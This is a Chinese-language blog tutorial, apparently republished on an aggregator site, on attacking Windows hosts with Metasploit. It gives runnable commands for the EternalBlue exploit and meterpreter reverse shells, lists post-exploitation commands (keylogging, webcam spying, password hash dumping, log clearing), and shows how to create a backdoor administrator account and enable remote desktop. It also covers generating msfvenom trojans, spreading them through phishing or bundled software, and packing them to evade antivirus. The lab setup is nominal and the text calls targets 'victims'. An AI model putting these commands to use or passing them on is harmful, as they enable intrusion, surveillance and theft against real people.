进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

这篇具有很好参考价值的文章主要介绍了进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

数据来源

  本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

得到ip地址我们能干嘛?

        首先进行端口扫描

为什么要进行端口扫描?

        端口扫描的作用就是发现目标主机开放的端口及其对应开放的服务,攻击者通过发现及利用服务所存在的漏洞,入侵目标主机。

- Nmap -扫描器之王

metasploit是什么?

        msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢岀漏洞和流行的 shellcode,并持续保持更新。

        netasploiti让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 

启动 metasploit 前需要做:

  • 打开ka终端
  • 使用 sudo su命令,并输入kali的密码kali,切换至root用户
  • 使用 msfdb init命令初始化 metasploit数据库(*可选) 

metasploit攻击 windows操作系统

        msfconsole           # 启动 metasploita命令行【命令行效率高,使用方便】

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

msf使用法则:

        使用模块  ->  配置模块必选项  ->  运行模块。        三步操作,就能实现对主流漏洞的攻击 

永恒之蓝漏洞:

        永恒之蓝是指2017年4月14日晚,黑客团体 ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了 Wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

metasploit攻击永恒之蓝全流程:

1. 使用模块

        use exploit/windows/smb/ms17_010_eternalblue

2. 设置必选项

        查看必选项【*required 为yes的就是必选项】 

        show options

或者

1. 搜索漏洞编号:

        search ms17_010       # 搜索2017年的10号漏洞永恒之蓝(微软定义),search 使用

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

2. 使用模块

         可以通过模块名称或模块编号使用模块

        use exploit/windows/smb/ms17_010_eternalblue  # 通过模块名称使用模块

        或(选择一种方式即可)

        use 0                                                                            # 通过模块编号使用模块

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

3. 查看模块所需要的配置内容

        show options              # 可以按tab键自动补全命令,show 显示/展示   options  选项

        必选项是:yes 的就是必选设置,一些是有默认的,一些是没有默认的就需要我们添加,如目标主机状态是yes,但是当前设置时空。

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

实验:

        1、准备一台靶机(我这里开了一台winXP),并查看靶机的IP地址(等下用做攻击目标)

        ipconfig          # 查看本机IP地址

        ifconfig eth# kali查看IP 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 2、回到kli设置metasploit的必选项,攻击目标这些

         set RHOSTS 192.168.0.103   # 设置目标IP地址,set  (设置)RHOSTS 目标主机的名称,代表你要攻击谁,目标主机地址也可以写一个范围如:192.168.0.103-254

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

        show options              # show 显示/展示   options  选项,查看还有什么需要设置的

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器        set payload windows/x64/meterpreter/reverse_tcp  # payload 是攻击载荷,就是攻击完成后想干啥,这里是想获取 meterpreter (默认就是这个)meterpreter是 metasploit 后渗透的神器 

        set LHOST 192.168.0.102          # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址默认就是kali自己的IP地址,如果你的不是那就可以修改

        set lport 10001   # 将端口设置为10001,代表你要在kali上开启的端口,1-65535随便选,但不能被占用,默认的端口是:4444,为了攻击的成功率可以改一下

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

        show options              # 查看配置

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 3、启动运行模块,开启攻击

        命令:run

        我这里攻击失败了,原因:192.168.0.103:445-由于失败而中止利用漏洞:无目标:此模块仅支持x64(64位)目标         

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

开一台64位操作系统的虚拟机,继续实验

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

继续查看主机IP

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

重新设置攻击目标

     set RHOSTS 192.168.0.106   # 设置目标IP地址

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 启动运行模块,开启攻击

        命令:run

     攻击成功命令行就会来到meterpreter>,这里就是拿到了目标主机的权限 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 攻击成功,拿到了对方的权限可以干嘛?可以输入:help   # 查看帮助

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 核心命令

命令   

说明

? “帮助”菜单
 background  当前会话的背景
bg 背景别名
bgkill 杀死背景meterpreter脚本
bglist 列出正在运行的后台脚本
bgrun 作为后台线程执行meterpreter脚本
channel 显示信息或控制活动通道
close 关闭频道
detach 分离meterpreter会话(对于http/https)
disable_unicode_encoding 禁用unicode字符串的编码
enable_unicode_encoding 启用unicode字符串的编码
exit                       终止meterpreter会话
get_timeouts 获取当前会话超时值
guid 获取会话guid
help                       帮助菜单
info 显示有关Post模块的信息
irb 在当前会话上打开交互式Ruby shell
load                       加载一个或多个meterpreter扩展
machine_id 获取连接到会话的计算机的MSF id
migrate                    将服务器迁移到另一个进程
pivot 管理数据透视侦听器
pry                        在当前会话上打开Pry调试器
quit                       终止meterpreter会话
read 从通道读取数据
resource 运行存储在文件中的命令
run 执行meterpreter脚本或Post模块
secure                     (重新)协商TLV数据包加密
sessions                   快速切换到另一个会话
set_timeouts 设置当前会话超时值
sleep 强制仪表安静,然后重新建立会话,用法:用法:sleep<秒数>
ssl_verify 修改ssl证书验证设置
transport                  管理运输机制
use “load”的别名已弃用
uuid 获取当前会话的uuid
write 将数据写入通道

Stdapi:文件系统命令

命令 说明
cat 将文件的内容读到屏幕上
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定的文件
dir 列表文件(ls的别名)
download 下载文件或目录
edit           编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcat 将本地文件的内容读取到屏幕

lcd

更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列表文件
mkdir 创建新目录
mv 将源文件移动到目标
pwd 打印工作目录
rm 删除指定的文件
rmdir 删除目录
search         搜索文件
show_mount 列出所有装载点/逻辑驱动器
upload 上载文件或目目录(可以用来上传文件到对方电脑)

Stdapi:网络命令

命令 说明
arp 显示主机arp缓存
getproxy 显示当前代理配置
ifconfig 显示界面
ipconfig 显示IP界面
netstat 显示网络连接与对方开放的端口
portfwd 将本地端口转发到远程服务
resolve        解析目标上的一组主机名
route 查看和修改路由表

Stdapi:系统命令

命令 说明
clearev 清除事件日志
drop_token 放弃任何活动模拟令牌。
execute        执行命令
getenv 获取一个或多个环境变量值
getpid 获取当前进程标识符
getprivs 尝试启用当前进程可用的所有权限
getsid 获取服务器正在运行的用户的SID
getuid 获取服务器运行的用户
kill 终止进程
localtime 显示目标系统的本地日期和时间
pgrep 按名称筛选进程
pkill 按名称终止进程
ps 列出正在运行的进程
reboot 重新启动远程计算机
reg 修改并与远程注册表交互
rev2self 在远程计算机上调用RevertToSelf()
shell 放入系统命令shell
shutdown 关闭远程计算机
stealt_token 尝试从目标进程中窃取模拟令牌
suspend 暂停或恢复进程列表
sysinfo 获取有关远程系统的信息,如操作系统

Stdapi:用户界面命令

命令 说明
enumdesktops 列出所有可访问的桌面和窗口工作站
getdesktop 获取当前meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送键击
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare     共享实时监视远程用户桌面
screenshot      截图,获取交互式桌面的截图
setdesktop 更改meterpreters当前桌面
uictl 控制一些用户界面组件

Stdapi:正在使用网络摄像头命令

命令 说明
record_mic 从默认麦克风录制音频X秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像机拍摄快照
webcam_stream 从指定的网络摄像机播放视频流(打开摄像头)

Stdapi:音频输出命令

命令 说明
play  在目标系统上播放波形音频文件(.wav)

Priv:提升命令

命令 说明
getsystem 尝试将您的权限提升到本地系统的权限

密码数据库命令

命令 说明
hashdump 转储SAM数据库的内容

Priv:时间戳命令

命令 说明
timestomp 操纵文件MACE属性

攻击成功后的命令使用:

        攻击成功后成功获取到对方主机的权限,上面的这操作命令直接输入到命令行使用就行了

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 注意:上面表格中的命令我也没有仔细检查过,如果使用时出现报错那应该是我填错了,这时可以输入命令:

        help   # 查看帮助,按类型获取到正确的命令,也可以在下方给我留言我会及时更改。

攻击成功后的使用示例: 

        攻击成功后能做什么meterpreter是强大的后渗透模块,可以输入help查看帮助信息

        远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统...这些看起来非常复杂又高级的操作都能用 meterpreter中一行或几个字母,简单的命令完成

例:创建后门用户并开启远程连接(3389) 

        shell                                                          # 启动dos窗口,这样就能使用DOS 命令

        chcp 65001                                              # 默认情况下编码为936,中文会出现乱码问题,65001为UTF-8的代码页,可以正常显示中文

        net user zhangsan 123456 /add & net localgroup administrators zhangsan /add 

        或分开执行

        net user zhangsan 123456 /add              # 创建一个用户名为“zhangsan ”密码是“123456 ”

        net localgroup administrators zhangsan /add    # 将zhangsan 加入到管理员组(提升权限)

        exit                                                            # 退到上一级目录(这里是退出dos窗口回到,meterpreter > )

        getsystem                                                  #  先将当前的session提升为system权限(以防万一)

        run post/windows/manage/enable_rdp   #  利用此后渗透模块即可直接开启远程桌面,开启受害者主机3389端口(远程桌面连接端口)

        这样一套命令下来,以后我们就可以直接使用 zhangsan 这个账号登录3389端口的远程桌面服务,远程控制目标主机(mstsc -v 目标ip)

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

rdesktop 192.168.0.103:3389  # 连接受害者主机的远程桌面,如下图所示:

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

需要注意的是你登录了,对方会被你挤下线 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

1)使用Kali渗透工具生成远控木马

        想远程控制别人?msfvenom 生成远控木马了解一下

        msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

      【* msfvenom在shell里使用,不是 msfconsole 终端】

        payload        攻击载荷 

        windows       是指微软的windows操作系统,如果目标是其他系统这里就改成其他系统名称如:Linux

        lhost               代表你是谁,既kali的IP地址

        lport              代表你要在kali上开启的端口,1-65535随便选,但不能被占用

        -f                    是指format(格式)

        exe                是windows格式文件,是指生成木马文件的文件格式,exe 和 dll(Windows 系列)、elf(Linux 系列)和 Mach-O(Mac系列)

        -o                  是指output(输出),后面跟的demo.exe是文件名,自定义随便改。

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo.exe 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=9988 R > /home/kali/Desktop/lanxf.apk
 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 生成木马文件示例:

        输入:exit    # 退回上一级,直到回到kali的命令行中

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

         msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.102 lport=9988 -f exe -o demo999.exe   # 生成木马文件

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

        现在文件就生成到桌面的我们可以在桌面查看文件 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

         这个文件可以通过邮箱或其他社交平台发送给对方,然后对方运行了之后我们就可以对他电脑进行远程控制(不过一般情况下会被对方的杀毒软件直接杀死)如下面这样,我们直接把木马文件复制到自己的真实机,杀毒软件会自动检测并杀死。

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

        注意:这里是在命令行的桌面路径下输入命令所以文件默认是生成在桌面,如果想改生成文件的位置,那就把命令后面的文件名改成路径加文件名,如:/home/kali/demo999.exe   。或者使用命令:cd 路径   # 更改命令行的路径

生成木马就完事?把木马文件发送到目标主机

(注意这一步需要使用上面写的方法通过metasploit获取到目标的权限才行,如果对方电脑没有漏洞获取不到对方权限,那就需要用钓鱼的方式让受害者自己下载,比如我们在百度上下载的软件都有很多捆绑软件)

        pwd                                                                 # 打印目标的工作目录

        upload /home/kali/桌面/demo999.exe          # 把木马文件发送到目标的电脑上

       upload /home/kali/桌面/demo999.exe d:\\    # 也可以指定文件路径,发送到对方的D盘根目录下

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

记得在 msfconsole里开启监听,等待受害者运行上钩 

        现在有了木马文件,我们要让别人下载,俗称:“钓鱼” 

首先:制作鱼钩

        msfconsole                         # 启动 metasploita命令行

        use exploit/multi/handler   # 使用模块

        show options                        # 查看设置,查看这个模块需要配置那些选项才能使用

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

1)设置攻击载荷:

         set payload windows/x64/meterpreter/reverse_tcp   # 这个攻击载荷就是上面我们使用的攻击载荷

        show options                                                                  # 查看设置

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

2)设置侦听地址

        set LHOST 192.168.0.102          # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址

        show options                                                                  # 查看设置

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

3)设置帧听端口:

        set lport 9988   # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样,我上面是用9988端口这里也要9988端口,默认的端口是4444

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

4)运行模块:run   # 简单理解就是把鱼钩放到河里

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

现在我们要做的就是等待鱼儿上钩:

  • 方法一:我们主动将钩子摁到鱼儿上(利用漏洞)
  • 方法二:姜太公钓鱼,愿者上钩!

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

假设目标通过网上下载了其他软件比如啥直播、游戏之类的,然后我的木马文件也和这些软件绑定了,他也运行了,之后我们就可以对他进行些操作。

通过命令运行对方的木马文件(需要使用上面写的方法通过metasploit获取到目标的权限)

        execute -H -i -f demo999.exe          # 运行demo999.exe这个刚才我们发到目标过去的木马文件, -H 不可见,-i 交互

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 然后输入:   help   # 查看通过这个木马文件我们能干啥,可以使用的功能和我上面列出来的命令一样

webcam_list 列出网络摄像头(查看对方的电脑有没有摄像头)
webcam_stream 从指定的网络摄像机播放视频流(打开摄像头)

我这里的目标是虚拟机所以这块,响应的信息是没有 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

 ctrl + c 退出监控

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

杀毒软件会查杀怎么办?一招教你躲避火绒的探测

        最基础的免杀【*对于其他杀毒软件效果不同,具体情况请自行尝试】

捆绑木马(现在基本没效果,杀毒软件的技术更新了)

        msfvenom -p windows/64/meterpreter/reverse tcp lhost=192.168.0.102 lport=9999 -f  exe-xnotepad++. exe -o notepad++.exe    

 加壳:压缩壳、加密壳

如:Themida

使用示例:

        打开软件 

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

然后耐心等待加密过程,最后加密成功的界面如下,之后就可以关闭软件了。

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

然后可以复制到真实机上测试

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

         后门木马请勿随意传播,如果造成危害属于提供计算机操作系统入侵工具罪及非法入侵计算机操作系统数罪并罚。文章来源地址https://www.toymoban.com/news/detail-457085.html

到了这里,关于进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali最强渗透工具- metasploit

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2023年04月16日
    浏览(27)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(26)
  • 【Kali Linux高级渗透测试】深入剖析Kali Linux:高级渗透测试技术与实践

    📕作者简介: 热爱跑步的恒川 ,致力于C/C++、Java、Python等多编程语言,热爱跑步,喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列,大家有兴趣的可以看一看 📘相关专栏C语言初阶、C语言进阶系列、恒川等,大家有兴趣的可以看一看 📙Python零基础入门系列,J

    2024年02月10日
    浏览(33)
  • 肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)

    请注意,在使用Metasploit Framework进行渗透测试和漏洞利用时,务必遵守合法和授权的原则,此文仅供大家学习参考,请确保您获得了适当的授权,并遵守法律和合规性要求。非法使用和滥用导致严重的法律后果自负。 目录 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    浏览(32)
  • Kali Linux渗透测试技术详解_渗透测试入门

    知识点 1. Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. 基本用法-重新设置root密码 5 安装debian11系统-默认命令行模式登录 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、

    2024年02月13日
    浏览(37)
  • 如何使用Kali Linux进行渗透测试?

    1. 渗透测试简介 渗透测试是通过模拟恶意攻击,评估系统、应用或网络的安全性的过程。Kali Linux为渗透测试人员提供了丰富的工具和资源,用于发现漏洞、弱点和安全风险。 2. 使用Kali Linux进行渗透测试的步骤 以下是使用Kali Linux进行渗透测试的基本步骤: 信息收集: 在进

    2024年02月12日
    浏览(28)
  • 【Kali Linux】高级渗透测试实战篇

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(30)
  • 渗透测试(8)- Kali Linux 系统概述

        Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。Kali Linux 是一款全功能的安全操作系统,它可以帮助用户完成各种安全任务,包括网络渗透测试、系统攻击、密码破解、恶意软件分析、社会工程学攻击等,同时也可以用于安全研究,帮助

    2024年01月17日
    浏览(27)
  • 从实践中学习Kali Linux渗透测试

    目录 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 1.1.2 白盒测试 1.1.3 灰盒测试 1.2 渗透测试流程 1.3 Kali Linux系统概述 1.3.1 为什么使用Kali Linux 1.3.2 Kali Linux发展史 1.4 法律边界 1.4.1 获取合法权限 1.4.2 部分操作的危害性 第二章 安装Kali Linux系统 2.1 下载镜像 2.1.1 获取

    2023年04月08日
    浏览(29)
  • 使用 Kali Linux 进行 Web 渗透测试

    在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。 一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的

    2024年01月23日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包